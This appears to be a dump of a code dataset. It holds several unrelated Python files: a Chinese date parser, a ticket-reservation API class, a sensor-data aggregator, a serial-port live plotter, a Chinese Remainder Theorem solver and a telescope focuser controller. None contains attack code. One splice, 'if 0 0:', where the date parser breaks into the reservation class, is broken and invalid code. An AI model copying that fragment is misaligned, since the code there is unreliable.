= 1\n for char in str:\n if char == '月':\n s += 1\n if char == '日' or char == '号':\n break\n if char.isdigit():\n num_nyr[s] += char\n Time.set_zone(3)\n if num_nyr[1] !='':\n Time.set_month(int(num_nyr[1]))\n if num_nyr[2] !='':\n Time.set_day(int(num_nyr[2]))\n return (1,'\\n年月日检测,月日改了\\n')\n\n if nyr == [True,True,True]:\n num_nyr = ['','','']\n s = 0\n for char in str:\n if (char == '年') or (char == '月'):\n s += 1\n if char == '日' or char == '号':\n break\n if char.isdigit():\n num_nyr[s] += char\n Time.set_zone(3)\n if num_nyr[0] !='':\n Time.set_year(int(num_nyr[0]))\n if num_nyr[1] !='':\n Time.set_month(int(num_nyr[1]))\n if num_nyr[2] !='':\n Time.set_day(int(num_nyr[2]))\n return (1,'\\n年月日检测,年月日改了\\n')\n# 使用#的个数来确定年月日\n if counter == 2:\n if len(number)<5:\n Time.set_zone(1)\n Time.set_year(int(number))\n return (1,'\\n#\\n改了年\\n')\n if counter == 3:\n if len(number) < 3:\n Time.set_zone(2)\n Time.set_month(int(number))\n return (2,'\\n#\\n改了月\\n')\n if counter == 4:\n if len(number) < 3:\n Time.set_zone(3)\n Time.set_day(int(number))\n return (3,'\\n#\\n改了日\\n')\n# 八数字检测\n if len(number) >= 8:\n num_nyr = [number[0:4],number[4:6],number[6:8]]\n Time.set_zone(3)\n Time.set_year(int(num_nyr[0]))\n Time.set_month(int(num_nyr[1]))\n Time.set_day(int(num_nyr[2]))\n return (8,'\\n年月日改了,八数字版本\\n')\n \n\n if 0 0:\n self.minutes_left = int(minutes_float)\n self.seconds_left = int(\n (minutes_float - self.minutes_left) * 60\n )\n\n else:\n self.minutes_left = 0\n self.seconds_left = 0\n\n def delete(self):\n \"\"\"Cancels this reservation, returns True if successful.\"\"\"\n\n crypto_block = self._get_crypto_block_for_object(\n method_name='make_reservation',\n interface_object=self\n )\n\n resp_dict = self.get_core_api().release_reservation(\n crypto_block=crypto_block,\n upfront_data_token=self.settings['upfront_data_token'],\n )\n\n return resolve_boolean(\n resp_dict['released_ok']\n )\n\n def purchase_part_one(\n self, return_token, return_domain, return_path,\n return_with_https, encryption_key, customer=None,\n card=None\n ):\n \"\"\"First part of the 2 stage purchase process.\n\n See the XML API documentation for more information about the\n purchase process.\n\n Args:\n return_token (string): Unique token for this purchase call.\n return_domain (string): The domain for the return URL.\n return_path (string): The path for the return URL.\n return_with_https (boolean): Indicates whether the URL should use\n HTTP or HTTPS.\n encryption_key (string): Encryption key for data.\n customer (Customer): Optional, Customer object representing the\n customer making the purchase.\n card (Card): Optional, Card object representing the payment\n card information.\n\n Returns:\n Dictionary: A dictionary containing an item called\n 'redirect_html_page_data' with a string value of\n HTML that should be passed to the user's browser\n in order to perform the redirect.\n \"\"\"\n\n if card:\n card_data = dict_ignore_nones(**card._get_dict())\n else:\n card_data = None\n\n if customer:\n customer_data = dict_ignore_nones(**customer._get_dict())\n else:\n customer_data = None\n\n https_string = boolean_to_yes_no(\n return_with_https\n )\n\n crypto_block = self._get_crypto_block_for_object(\n method_name='make_reservation',\n interface_object=self\n )\n\n resp_dict = self.get_core_api().purchase_reservation_part_one(\n crypto_block=crypto_block,\n upfront_data_token=self.settings['upfront_data_token'],\n customer_data=customer_data,\n return_token=return_token, return_domain=return_domain,\n 
return_path=return_path, return_with_https=https_string,\n encryption_key=encryption_key, card_data=card_data,\n )\n\n return resp_dict\n\n def purchase_part_two(\n self, returning_token, new_return_token, new_return_path, http_referer,\n http_accept, http_user_agent, callback_data, encryption_key,\n send_confirmation_email=None, results_url=None\n ):\n \"\"\"Second part of the 2 stage purchase process.\n\n See the XML API documentation for more information about the\n purchase process.\n\n Args:\n returning_token (string): The return token from part one.\n new_return_token (string): A new unique token for this call.\n new_return_path (string): The path for the return URL.\n http_referer (string): The user's 'Referer' HTTP header.\n http_accept (string): The user's 'Accept' HTTP header.\n http_user_agent (string): The user's 'User-Agent' HTTP header.\n callback_data (dictionary): All POST and GET variables.\n encryption_key (string): Encryption key for data.\n send_confirmation_email (boolean): Optional, boolean indicating\n whether TSW should send a confirmation email or not.\n results_url (string): Optional, URL of the confirmation page.\n\n Returns:\n Dictionary: If an additional redirect is required, then the\n dictionary will contain an item called\n 'redirect_html_page_data' which is the same as described in\n part one. This redirect must be followed to complete the\n purchase.\n \"\"\"\n\n crypto_block = self.get_crypto_block(\n method_name='start_session',\n password_required=False\n )\n\n resp_dict = self.get_core_api().purchase_reservation_part_two(\n returning_token=returning_token, new_return_token=new_return_token,\n new_return_path=new_return_path, http_referer=http_referer,\n http_accept=http_accept, http_user_agent=http_user_agent,\n callback_data=callback_data, encryption_key=encryption_key,\n crypto_block=crypto_block,\n upfront_data_token=self.settings['upfront_data_token'],\n send_confirmation_email=send_confirmation_email,\n results_url=results_url,\n )\n\n if 'trolley' in resp_dict:\n self.transaction_id = resp_dict['trolley'].transaction_id\n self._core_trolley = resp_dict['trolley']\n\n if 'trolley_token' in resp_dict:\n self.trolley_id = resp_dict['trolley_token']\n\n if 'customer' in resp_dict:\n customer = Customer(\n core_customer=resp_dict['customer']\n )\n\n resp_dict['customer'] = customer\n self.customer = customer\n else:\n self.customer = None\n\n if 'self_print_html_pages' in resp_dict:\n self.self_print_urls = resp_dict['self_print_html_pages']\n\n return resp_dict\n\n def purchase_reservation(\n self, customer=None, send_confirmation_email=None,\n ):\n \"\"\"A one stage purchase process that should only be used for purchases\n made on credit.\n\n See the XML API documentation for more information about the\n purchase process. 
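# A hedged usage sketch of the two-stage purchase flow documented above. The
# keyword arguments follow the purchase_part_one/purchase_part_two signatures
# defined in this module; `reservation`, `customer`, `card`, the tokens,
# paths, header values and `request_vars` are hypothetical placeholders, so
# this is illustrative only, not a runnable transaction.
#
# resp = reservation.purchase_part_one(
#     return_token='tok-1', return_domain='example.com',
#     return_path='/booking/return', return_with_https=True,
#     encryption_key='key', customer=customer, card=card)
# # serve resp['redirect_html_page_data'] to the user's browser, then,
# # when the user returns from the payment redirect:
# resp = reservation.purchase_part_two(
#     returning_token='tok-1', new_return_token='tok-2',
#     new_return_path='/booking/confirm', http_referer=referer,
#     http_accept=accept, http_user_agent=user_agent,
#     callback_data=request_vars, encryption_key='key')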
Note the absence of a 'card_data' element\n in the input - this is intentional since the 2-stage purchase process\n (calling purchase_part_one & purchase_part_two) should always be used\n whenever a payment method is required.\n\n Args:\n customer (Customer): Optional, Customer object representing the\n customer making the purchase.\n send_confirmation_email (boolean): Optional, boolean indicating\n whether TSW should send a confirmation email or not.\n\n Returns:\n Dictionary: The result of the attempted purchase\n \"\"\"\n\n if customer:\n customer_data = dict_ignore_nones(**customer._get_dict())\n else:\n customer_data = None\n\n crypto_block = self._get_crypto_block_for_object(\n method_name='make_reservation',\n interface_object=self\n )\n\n resp_dict = self.get_core_api().purchase_reservation(\n crypto_block=crypto_block,\n upfront_data_token=self.settings['upfront_data_token'],\n customer_data=customer_data,\n send_confirmation_email=send_confirmation_email,\n )\n\n return resp_dict\n\n @property\n def transaction_status(self):\n \"\"\"Status of the reservation.\"\"\"\n if self._transaction_status is None:\n self.get_details()\n\n if self._transaction_status:\n return self._transaction_status\n else:\n return None\n\n @transaction_status.setter\n def transaction_status(self, value):\n if value is None:\n self._transaction_status = False\n else:\n self._transaction_status = value\n\n @property\n def remote_site(self):\n \"\"\"The domain that the transaction was made on.\"\"\"\n if self._remote_site is None:\n self.get_details()\n\n if self._remote_site:\n return self._remote_site\n else:\n return None\n\n @remote_site.setter\n def remote_site(self, value):\n if value is None:\n self._remote_site = False\n else:\n self._remote_site = value\n\n @property\n def customer(self):\n \"\"\"Customer object representing the customer on the reservation.\"\"\"\n if self._customer is None:\n self.get_details()\n\n if self._customer:\n return self._customer\n else:\n return None\n\n @customer.setter\n def customer(self, value):\n if value is None:\n self._customer = False\n else:\n self._customer = value\n\n @property\n def confirmation_page_html(self):\n \"\"\"HTML of the confirmation page, if it was stored.\"\"\"\n if self._confirmation_page_html is None:\n self.get_details()\n\n if self._confirmation_page_html:\n return self._confirmation_page_html\n else:\n return None\n\n @confirmation_page_html.setter\n def confirmation_page_html(self, value):\n if value is None:\n self._confirmation_page_html = False\n else:\n self._confirmation_page_html = value\n\n def get_details(self):\n \"\"\"Retrieves information about the reservation.\n\n Called internally by several methods/properties, it shouldn't\n be necessary to call this method explicitly.\n\n Returns:\n Reservation: Self, with updated data.\n \"\"\"\n crypto_block = self.get_crypto_block(\n method_name='start_session',\n password_required=False\n )\n\n resp_dict = self.get_core_api().transaction_info(\n transaction_id=self.transaction_id, describe_trolley=True,\n describe_customer=True, describe_external_sale_page=True,\n crypto_block=crypto_block,\n upfront_data_token=self.settings['upfront_data_token'],\n )\n\n self.transaction_status = resp_dict['transaction_status']\n self._set_time_left(resp_dict['minutes_left_on_reserve'])\n self.remote_site = resp_dict['remote_site']\n\n self._core_trolley = resp_dict['trolley']\n\n if 'customer' in resp_dict:\n\n lang_str = resp_dict.get('language_list', None)\n\n if lang_str:\n langs = 
lang_str.split(',')\n\n self.customer = Customer(\n core_customer=resp_dict['customer'],\n languages=langs,\n )\n\n else:\n self.customer = None\n\n if 'sale_page' in resp_dict:\n self.confirmation_page_html = resp_dict['sale_page'].sale_page\n else:\n self.confirmation_page_html = None\n\n if 'self_print_html_pages' in resp_dict:\n self.self_print_urls = resp_dict['self_print_html_pages']\n\n return self\n\n @property\n def self_print_urls(self):\n \"\"\"List of URLs for self print vouchers on this reservation.\"\"\"\n if self._self_print_urls is None:\n self.get_details()\n\n return self._self_print_urls\n\n @self_print_urls.setter\n def self_print_urls(self, value):\n self._self_print_urls = value\n\n def set_confirmation_page(self, html):\n \"\"\"Store the confirmation page HTML in the TSW system.\n\n Args:\n html (string): HTML to store.\n\n Returns:\n Boolean: True if data was saved successfully.\n \"\"\"\n\n crypto_block = self.get_crypto_block(\n method_name='start_session',\n password_required=False\n )\n\n resp_dict = self.get_core_api().save_external_sale_page(\n crypto_block=crypto_block,\n upfront_data_token=self.settings['upfront_data_token'],\n transaction_id=self.transaction_id,\n sale_page_type='text', sale_page_subtype='html', sale_page=html,\n )\n\n if resp_dict['saved_this_page'] == 'yes':\n return True\n else:\n return False\n\n @property\n def is_released(self):\n \"\"\"Boolean indicating if the reservation was released.\"\"\"\n if self.transaction_status == 'released':\n return True\n elif self.transaction_status:\n return False\n return None\n\n @property\n def is_purchased(self):\n \"\"\"Boolean indicating if the reservation was purchased successfully.\"\"\"\n if self.transaction_status == 'purchased':\n return True\n elif self.transaction_status:\n return False\n return None\n\n @property\n def is_purchase_successful(self):\n \"\"\"Boolean indicating if the reservation was purchased successfully.\n\n Overrides trolley function.\n \"\"\"\n return self.is_purchased\n\n @property\n def is_reserved(self):\n \"\"\"Boolean indicating if the Reservation object is reserved.\"\"\"\n if self.transaction_status == 'reserved':\n return True\n elif self.transaction_status:\n return False\n return None\n\n @property\n def is_attempting(self):\n \"\"\"Boolean indicating if TSW is currently attempting to reserve.\"\"\"\n if self.transaction_status == 'attempting':\n return True\n elif self.transaction_status:\n return False\n return None\n\n def _create_bundle(self, core_bundle):\n return bundle_objs.Bundle(\n core_bundle=core_bundle,\n self_print_urls=self.self_print_urls,\n **self._internal_settings()\n )\n\n @property\n def need_payment_card(self):\n \"\"\"Boolean indicating if a payment card is required for purchase.\"\"\"\n return resolve_boolean(\n self._need_payment_card\n )\n\n @property\n def needs_email_address(self):\n \"\"\"Boolean indicating if an email address is required for purchase.\"\"\"\n return resolve_boolean(\n self._needs_email_address\n )\n\n @property\n def supports_billing_address(self):\n \"\"\"Boolean indicating if billing address can be provided during\n purchase.\"\"\"\n return resolve_boolean(\n self._supports_billing_address\n )\n\n @property\n def needs_agent_reference(self):\n return resolve_boolean(\n self._needs_agent_reference\n 
)\n","sub_path":"pyticketswitch/interface_objects/reservation.py","file_name":"reservation.py","file_ext":"py","file_size_in_byte":19652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"495248735","text":"# encoding = utf-8\n\nimport pandas as pd\nimport common\n# 导入自开发包\nfrom aggregate_capture import check_functions as chk_f\nfrom aggregate_capture import aggregation_functions as agg_f\nfrom aggregate_capture import consistency_functions as consis_f\n\nfrom log import log\nfrom error_demo.error_code import *\nlogger = log.log_demo()\n\nclass AggregateCapture():\n\n def __init__(self, config, dao, dfs, vargroup_channels, consistency_models):\n \"\"\"\n 初始化关键数据\n :param config: 单例配置项对象\n :param dao: 单例数据库连接对象\n :param dfs: 按照{capture_x:Dataframe}组织的表格,key是capture_x, value是capture的数据\n :param vargroup_channels: 是一个VargroupChannel对象,决定不同的设备的污染物类型及不同污染物的出数通道\n :param consistency_models: 一致性模型\n \"\"\"\n self.dao = dao\n self.config = config\n self.dfs = dfs\n self.vargroup_channels = vargroup_channels\n self.consistency_models = consistency_models\n self.consis_agent = consis_f.ConsistencyAgent(config)\n self.agg_agent = agg_f.AggregationAgent(config)\n self.check_agent = chk_f.CheckAgent(config)\n\n def capture_to_org(self, hour, is_for_minute=False):\n \"\"\"\n 将capture数据聚合为org数据\n 1. 对每种变量的异常数据进行剔除\n 2. 处理多个传感器的数据合并(考虑内容:如果三缺一,三缺二,二缺一怎么处理?)\n 3. 处理从分钟级到小时级的数据合并\n :return: 不做返回,直接将处理好的org数据入库\n \"\"\"\n # 获取需要处理的变量,例如温度、湿度实际上也是需要处理的(暂时还没想好怎么organize)\n tables = self.dfs.keys()\n #初始化一个空的字典,装org数据\n org={}\n for cap_x in tables:\n # logger.info('table {} begin....'.format(cap_x))\n df_cap_x = self.dfs[cap_x]\n\n vg_ids = df_cap_x['VARGROUP_ID'].unique()\n\n org_vargroupid = pd.DataFrame()\n for vg_id in vg_ids:\n var_names = self.vargroup_channels.get_var_names_by_vargroup(vg_id)\n # logger.info('VARGROUP_ID {} begin...... and the vargroup_id has channels: {}'.format(vg_id,var_names))\n full_df = pd.DataFrame()\n for var_name in var_names:\n print(\"正在处理{}表下的{}下的{}污染物......\".format(cap_x,vg_id,var_name))\n channel_header = self.vargroup_channels.get_channels_by_vargroup_and_var(vg_id, var_name)\n # logger.info('var {} begin.... 
and the var has channel_header {}'.format(var_name,channel_header))\n cur_df = df_cap_x[df_cap_x['VARGROUP_ID'] == vg_id][['DEV_ID', 'CAP_TIME', 'MEA_POINT_ID'] + channel_header]\n\n # 处理异常数据并输出日志\n var_df, _, _ = self.check_agent.clean_capture_data(cur_df, var_name, channel_header)\n\n # 对clean后的cap数据应用一致性模型\n if len(var_df.columns) == 3:\n logger.debug('after clean_capture_data there is no valid data!')\n continue\n else:\n var_df = self.consis_agent.apply_consistency_model(var_df, var_name, channel_header, self.consistency_models)\n if var_df.empty:\n logger.debug('after apply_consistency_model there is no valid data!')\n continue\n else:\n # 聚合多通道数据\n agg_var_df = self.agg_agent.combine_capture_channels(var_df, var_name, channel_header)\n\n # # 聚合分钟级数据到小时\n # ['DEV_ID', 'CAL_TIME', VAR_NAME, COUNT_VAR_NAME]\n # e.g., ['DEV_ID', 'CAL_TIME', 'COUNT_PM25', 'PM25']\n if agg_var_df.empty:\n continue\n if is_for_minute==False:\n hour_var_df = self.agg_agent.agg_minutes_to_hours(agg_var_df, var_name)\n else:\n print(\"不用做小时级别的聚合!\")\n #虚拟聚合(只有几条数据)\n hour_var_df = self.agg_agent.agg_minutes_to_hours(agg_var_df, var_name, hour)\n #合并各个污染物\n full_df = self.agg_agent.merge_df(hour_var_df,full_df)\n org_vargroupid = self.agg_agent.concat_df(full_df,org_vargroupid)\n org[cap_x]=org_vargroupid\n if is_for_minute==False:\n # 回写数据库\n self.dao.write_org_db(org,hour)\n return org\n else:\n #不入数据库\n #返回数据放到内存里待用\n return org\n\n def agg_across_multi_sensors(self, var):\n pass\n","sub_path":"quality_control_platform/aggregate_capture/agg_capture.py","file_name":"agg_capture.py","file_ext":"py","file_size_in_byte":5061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"641066911","text":"import csv\nimport datetime\nimport os\nimport time\n\nimport matplotlib\nimport matplotlib.dates as mdates\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport serial\n\nfrom .keypress import KBHit\n\n\ndef tiempo_real(plot_window, logear):\n carpeta = \"data\"\n\n if os.name == \"nt\": # Windows\n ser = serial.Serial(\"COM3\")\n else:\n ser = serial.Serial(\"/dev/ttyUSB0\")\n\n ser.flushInput()\n\n # Abrimos el archivo de log si esta activado el modo log\n if logear:\n fecha_inicio = datetime.datetime.now().strftime(\"%Y-%m-%d %H-%M-%S\")\n archivo = open(f\"{carpeta}/log.csv\", \"w+\", newline=\"\")\n escritor = csv.writer(archivo)\n # IMPORTANTE: Esto es la cantidad de segundos que se quieren visualizar\n # Me creo los datos que van a ir en el eje X e Y, inicialmente son valores cualquiera\n # para rellenar\n y_luz = np.array(np.zeros([plot_window]))\n ahora = datetime.datetime.now()\n x_luz = [\n ahora - datetime.timedelta(0, plot_window - n)\n for n in range(1, plot_window + 1)\n ]\n\n y_hum = np.array(np.zeros([plot_window]))\n x_hum = [\n ahora - datetime.timedelta(0, plot_window - n)\n for n in range(1, plot_window + 1)\n ]\n\n # Enciende el modo interactivo\n plt.ion()\n fig_luz, ax_luz = plt.subplots()\n line_luz, = ax_luz.plot(y_luz)\n scat_luz_on, = ax_luz.plot(y_luz, lw=0, marker=\"^\")\n scat_luz_off, = ax_luz.plot(y_luz, lw=0, marker=\"v\")\n y_luz_on = y_luz[:]\n y_luz_off = y_luz[:]\n x_luz_on = x_luz[:]\n x_luz_off = x_luz[:]\n\n plt.title(\"LUZ\")\n plt.xlabel(\"Instante\")\n plt.ylabel(\"Nivel de Luz [lux]\")\n\n plt.gca().xaxis.set_major_formatter(mdates.DateFormatter(\"%H:%M:%S\"))\n plt.gca().xaxis.set_major_locator(\n mdates.SecondLocator(interval=int(plot_window / 5)))\n\n fig_hum, ax_hum = plt.subplots()\n line_hum, = 
ax_hum.plot(y_hum)\n scat_hum_on, = ax_hum.plot(y_hum, lw=0, marker=\"^\")\n scat_hum_off, = ax_hum.plot(y_hum, lw=0, marker=\"v\")\n y_hum_on = y_hum[:]\n y_hum_off = y_hum[:]\n x_hum_on = x_hum[:]\n x_hum_off = x_hum[:]\n\n plt.title(\"HUMEDAD\")\n plt.xlabel(\"Instante\")\n plt.ylabel(\"Nivel de Humedad [%]\")\n\n # Config_luzura para que se puedan ver bien las fechas en el eje X\n # En la segunda linea, interval es cada cuantos segundos se pone un label\n # sobre el eje X\n plt.gca().xaxis.set_major_formatter(mdates.DateFormatter(\"%H:%M:%S\"))\n plt.gca().xaxis.set_major_locator(\n mdates.SecondLocator(interval=int(plot_window / 5)))\n\n # humedad en un vaso de agua\n max_humedad = 452\n # 1024 - 452: máxima tasa de humedad con respecto a la referencia\n max_tasa = 572\n # 1024: máximo valor observable por el pin analógico\n\n kb = KBHit()\n while not (kb.kbhit() and kb.getch() == \"q\"):\n try:\n try:\n ser_bytes = ser.readline().decode()\n except UnicodeDecodeError: # Windows\n ser_bytes = ser.readline().decode(\"cp1252\").encode(\"utf-8\")\n\n try:\n decoded_bytes = ser_bytes.rstrip().split()\n except BaseException:\n continue\n\n _, humedad, _, luz, estado = decoded_bytes\n humedad = abs(max_humedad -\n (float(humedad) - max_tasa)) / max_tasa * 100\n luz = float(luz)\n estado = int(estado)\n abierto = \"Abierto\" if estado else \"Cerrado\"\n tiempo = datetime.datetime.now()\n # Bajo al log\n if logear:\n escritor.writerow([\n tiempo.strftime(\"%Y-%m-%d;%H:%M:%S\"), humedad, luz, abierto\n ])\n\n # Actualizo los valores de ambos ejes\n y_luz = np.append(y_luz, luz)\n y_luz = y_luz[1:plot_window + 1]\n x_luz.append(tiempo)\n x_luz = x_luz[1:plot_window + 1]\n\n y_luz_on = np.append(y_luz_on, luz if estado else None)\n x_luz_on = np.append(x_luz_on, tiempo if estado else None)\n x_luz_on = x_luz_on[1:plot_window + 1]\n y_luz_on = y_luz_on[1:plot_window + 1]\n\n y_luz_off = np.append(y_luz_off, luz if not estado else None)\n x_luz_off = np.append(x_luz_off, tiempo if not estado else None)\n x_luz_off = x_luz_off[1:plot_window + 1]\n y_luz_off = y_luz_off[1:plot_window + 1]\n\n y_hum = np.append(y_hum, humedad)\n y_hum = y_hum[1:plot_window + 1]\n x_hum.append(datetime.datetime.now())\n x_hum = x_hum[1:plot_window + 1]\n # Seteo la nueva data\n y_hum_on = np.append(y_hum_on, humedad if estado else None)\n x_hum_on = np.append(x_hum_on, tiempo if estado else None)\n x_hum_on = x_hum_on[1:plot_window + 1]\n y_hum_on = y_hum_on[1:plot_window + 1]\n\n y_hum_off = np.append(y_hum_off, humedad if not estado else None)\n x_hum_off = np.append(x_hum_off, tiempo if not estado else None)\n x_hum_off = x_hum_off[1:plot_window + 1]\n y_hum_off = y_hum_off[1:plot_window + 1]\n\n scat_luz_on.set_data(\n [elem for elem in x_luz_on if elem is not None],\n [l for l in y_luz_on if l is not None],\n )\n scat_luz_off.set_data(\n [elem for elem in x_luz_off if elem is not None],\n [l for l in y_luz_off if l is not None],\n )\n\n scat_hum_on.set_data(\n [elem for elem in x_hum_on if elem is not None],\n [l for l in y_hum_on if l is not None],\n )\n scat_hum_off.set_data(\n [elem for elem in x_hum_off if elem is not None],\n [l for l in y_hum_off if l is not None],\n )\n\n line_luz.set_data(x_luz, y_luz)\n ax_luz.relim()\n ax_luz.autoscale_view()\n\n # Redibujar el grafico\n \"\"\"\n fig_hum.canvas.draw() \n fig_luz.canvas.flush_events()\n \"\"\"\n\n fig_luz.canvas.draw_idle()\n try:\n # plt.pause(0.06)\n fig_luz.canvas.flush_events()\n except: # Windows\n break\n\n fig_luz.autofmt_xdate()\n\n 
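# A self-contained sketch of the live-redraw idiom used on fig_luz/fig_hum
# above: mutate the existing artists with set_data, rescale, then repaint
# without blocking the serial read loop. The data here is synthetic and all
# names are local to this sketch; only matplotlib and numpy are assumed.
import numpy as np
import matplotlib.pyplot as plt

plt.ion()                           # interactive mode, as in the script
demo_fig, demo_ax = plt.subplots()
demo_line, = demo_ax.plot([], [])
for i in range(1, 100):
    xs = np.arange(i)
    demo_line.set_data(xs, np.sin(xs / 5.0))  # update the existing artist
    demo_ax.relim()                 # recompute data limits from the artist
    demo_ax.autoscale_view()        # apply the new limits to the axes
    demo_fig.canvas.draw_idle()     # schedule a repaint
    demo_fig.canvas.flush_events()  # process GUI events without blocking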
line_hum.set_data(x_hum, y_hum)\n ax_hum.relim()\n ax_hum.autoscale_view()\n\n # Redibujar el grafico\n # fig_hum.canvas.draw()\n # fig_hum.canvas.flush_events()\n\n fig_hum.canvas.draw_idle()\n try:\n # plt.pause(0.05)\n fig_hum.canvas.flush_events()\n except: # Windows\n break\n\n fig_hum.autofmt_xdate()\n\n except KeyboardInterrupt:\n print(\"Keyboard Interrupt\")\n break\n\n if logear:\n fecha_final = datetime.datetime.now().strftime(\"%Y-%m-%d %H-%M-%S\")\n\n archivo.close()\n old_file = os.path.join(carpeta, \"log.csv\")\n new_file = os.path.join(carpeta, f\"{fecha_inicio}__{fecha_final}.csv\")\n os.rename(old_file, new_file)\n\n\n ax_luz.cla()\n ax_hum.cla()\n fig_hum.clf()\n fig_luz.clf()\n plt.close(\"all\")\n del fig_luz\n del fig_hum\n plt.ioff()\n kb.set_normal_term()\n","sub_path":"funcionalidades/visualizar_tiempo_real.py","file_name":"visualizar_tiempo_real.py","file_ext":"py","file_size_in_byte":7263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"42762611","text":"from math import gcd\r\nfrom functools import reduce\r\n\r\n# This program Solves any linear system of congruences for which the moduli are co-prime.\r\n\r\n\r\n# Checks if all elements of a list are coprime with each-other\r\ndef pairwiseCoprime(l):\r\n return not any(gcd(I, J) != 1 for i, I in enumerate(l) for J in l[i + 1:])\r\n\r\n \r\ndef simplify(L):\r\n if len(L) == 2: return L\r\n if len(L) == 4: L = [L[0], (L[2] - L[1]) % L[3], L[3]]\r\n \r\n # Find L[0]*i such that L[0]*i = L[1] (mod L[2])\r\n for i in range(1, L[2]):\r\n if (L[0] * i) % L[2] == L[1]: return [i % L[2], L[2]]\r\n \r\n return [L[1], L[2]]\r\n\r\n \r\ndef CRT(inp):\r\n inp = [simplify(L) for L in inp] # Simplify each item in system\r\n secondProd = reduce(lambda x, y: x * y, [item[1] for item in inp]) # Product of moduli\r\n\r\n if not pairwiseCoprime([L[1] for L in inp]): return False # No Solution\r\n\r\n ans = [secondProd // i1[1] for i1 in inp]\r\n for j in range(len(inp)):\r\n ansJCopy = ans[j]\r\n while ans[j] % inp[j][1] != inp[j][0]: ans[j] += ansJCopy\r\n \r\n return (sum(ans) % secondProd, secondProd) # Returns minimal solution\r\n\r\n# [3,2,7,3] means 3x+2 = 7 (mod 3)\r\n# [3,2,3] means 3x = 2 (mod 3)\r\n# [2,3] means x = 2 (mod 3)\r\n\r\n\r\nLsys = [[1, 2], [1, 3], [1, 5], [3, 7]]\r\nsol = CRT(Lsys)\r\nprint(\"{0} (mod {1})\".format(sol[0], sol[1]))\r\ninput()\r\n\r\n# EXPANSION:\r\n # See https://math.stackexchange.com/questions/120070/chinese-remainder-theorem-with-non-pairwise-coprime-moduli\r\n","sub_path":"Math/Solvers/chineseRemainderTheorem.py","file_name":"chineseRemainderTheorem.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"3308055","text":"\"\"\"\nfocuser_control.py\nJessica A. 
Evans\n22/10/18\n\n 02/01/19 - Contains all the serial-port control functions for the focusers, and\n the startup/shutdown functions\n\n\n\tCURRENT FUNCTIONS:\n\t----------------------------------------------------------------------\n\tFocuser Control\n\t----------------------------------------------------------------------\n\t- check_config_port_values_for_focuser(config_dict)\n\t\n\t- get_start_end_chars(command)\n\t\n\t- check_focuser_no(x)\n\t\n\t- get_focuser_name(port, x=1)\n\t\n\t- halt_focuser(port, x=1)\n\t\n\t- home_focuser(port, x=1)\n\t\n\t- center_focuser(port, x=1)\n\t\n\t- move_to_position(pos, port, x=1)\n\t\n\t- move_focuser_in(port, x=1, move_speed=1)\n\t\n\t- move_focuser_out(port, x=1, move_speed=1)\n\t\n\t- end_relative_move(port, x=1)\n\n\t----------------------------------------------------------------------\n\tFocuser Configuration/Status Functions\n\t----------------------------------------------------------------------\n\n\t- get_focuser_status(port, x=1)\n\t\n\t- get_focuser_stored_config(port, x=1)\n\t\n\t- set_device_name(port, device_name, x=1)\n\t\n\t- set_device_type(port, x=1, device_type = 'OB')\n\t\n\t- set_temp_comp(port,x=1, temp_comp=False)\n\t\n\t- set_temp_comp_mode(port,x=1 mode='A')\n\t\n\t- set_temp_comp_coeff(port, x=1, mode, temp_coeff_val)\n\t\n\t- set_temp_comp_start_state(port, x=1, temp_comp_start = False)\n\t\n\t- set_backlash_comp(port, x=1, backlash_comp = False)\n\t\n\t- set_backlash_steps(port, x=1,backlash_steps = 10)\n\t\n\t- set_LED_brightness(brightness, port)\n\t\n\t----------------------------------------------------------------------\n\tGroup Observing Functions\n\t----------------------------------------------------------------------\n\t\n\t- focuser_initial_configuration(config_file_name, config_file_loc = \n\t\t'configs/')\n\t\n\t- startup_focuser(config_file_name, config_file_loc = 'configs/')\n\t\n\"\"\"\n\"\"\"\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nFOCUSER CONTROL FUNCTIONS\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\"\"\"\nimport common\nimport serial\nimport logging\nimport time\nimport PLC_interaction_functions as plc\nimport settings_and_error_codes as set_err_codes\n\nfocus_logger = logging.getLogger(__name__)\nfocus_logger.setLevel(logging.INFO)\nfocusHand = logging.FileHandler(filename = set_err_codes.LOGFILES_DIRECTORY+\\\n\t\t\t\t\t\t'focuser.log', mode = 'a')\nfocusHand.setLevel(logging.INFO)\nlogging.Formatter.converter = time.gmtime\nformatter = logging.Formatter('%(asctime)s [%(name)s] %(levelname)s - '\\\n\t\t'%(message)s','%Y-%m-%d_%H:%M:%S_UTC')\nfocusHand.setFormatter(formatter)\nfocus_logger.addHandler(focusHand)\n\n\ndef check_config_port_values_for_focuser(config_dict):\n\t\"\"\"\n\tCheck that the values specified in the config file match what is expected \n\t by the filter wheel manual, includes checks for the baud rate, data bits, \n\t stop bits and parity\n\t \n\t PARAMETERS\n\t \n\t config_file = the config file wth the parameters to be tested\n\t \n\t\"\"\"\n\t\n\t# BAUD RATE\n\tif 'baud_rate' in config_dict.keys():\n\t\tif config_dict['baud_rate'] != 115200:\n\t\t\tfocus_logger.critical('Unexpected baud rate for focuser, 115200 is'\\\n\t\t\t\t' expected')\n\t\t\traise ValueError('Unexpected baud rate for focuser, 115200 is '\\\n\t\t\t\t'expected')\n\telse:\n\t\tfocus_logger.critical('No baud rate found in config file.')\n\t\traise KeyError('No baud rate found in config file.')\n\t\n\t# DATA BITS\n\tif 'data_bits' 
